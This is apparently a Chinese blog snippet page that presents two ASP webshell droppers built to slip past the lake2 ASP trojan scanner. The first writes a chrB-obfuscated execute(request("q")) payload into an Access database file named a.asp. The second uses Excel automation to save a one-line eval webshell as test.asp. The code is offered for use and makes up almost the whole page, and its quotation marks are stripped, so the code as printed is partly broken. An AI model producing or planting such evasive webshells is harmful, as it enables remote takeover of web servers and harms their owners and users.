两个非常规ASP木马(可躲过扫描)
2018-09-06 12:49
hanxiaolian
为了躲避 lake2 ASP站长管理助手而写..
一.绕过lake2 Asp木马扫描的小马
复制代码 代码如下:
<%
set c = CreateObject(ADOX.Catalog)
c.create(Provider=Microsoft.Jet.OLEDB.4.0;Data Source=&Server.MapPath(a.asp))
set c = Nothing
c&Server.MapPath(a.asp)
conn.open connstr
conn.execute(create table nomm(nomuma oleobject))
set rs=server.createobject(adodb.recordset)
sql=SELECT * FROM nomm
rs.open sql,conn,1,3
rs.addnew
rs (nomuma).appendchunk(chrB(asc(<))&chrB(asc(%))&chrB(asc (e))&chrB
(asc(x))&chrB(asc(e))&chrB(asc(c))&chrB(asc (u))&chrB(asc(t))&chrB(asc
(e))&chrB(asc(+))&chrB(asc (r))&chrB(asc(e))&chrB(asc(q))&chrB(asc
(u))&chrB(asc (e))&chrB(asc(s))&chrB(asc(t))&chrB(asc(())&chrB(34)
&chrB(asc(q))&chrB(34)&chrB(asc()))&chrB(asc(%))& chrB(asc(>)))
rs.update
rs.close
set rs=nothing
conn.close
set conn=nothing
%>
二.xls版asp webshell
复制代码 代码如下:
<%
Set xlA = Server.CreateObject(Excel.Application)
xlA.Visible = False
xlA.Workbooks.Add
Set xlWorksheet = xlA.Worksheets(1)
xlWorksheet.Cells(1,1).Value = <%ex&ec&ute(request(q))+chr(37)+>
strFile = d:/test.asp
strFile = Server.MapPath(test.asp)
xlWorkSheet.SaveAs strFile
xlA.Quit
Set xlWorksheet = Nothing
Set xlA = Nothing
%>
上一篇:ASP数据库恢复的代码
下一篇:在用户离开页面时提示信息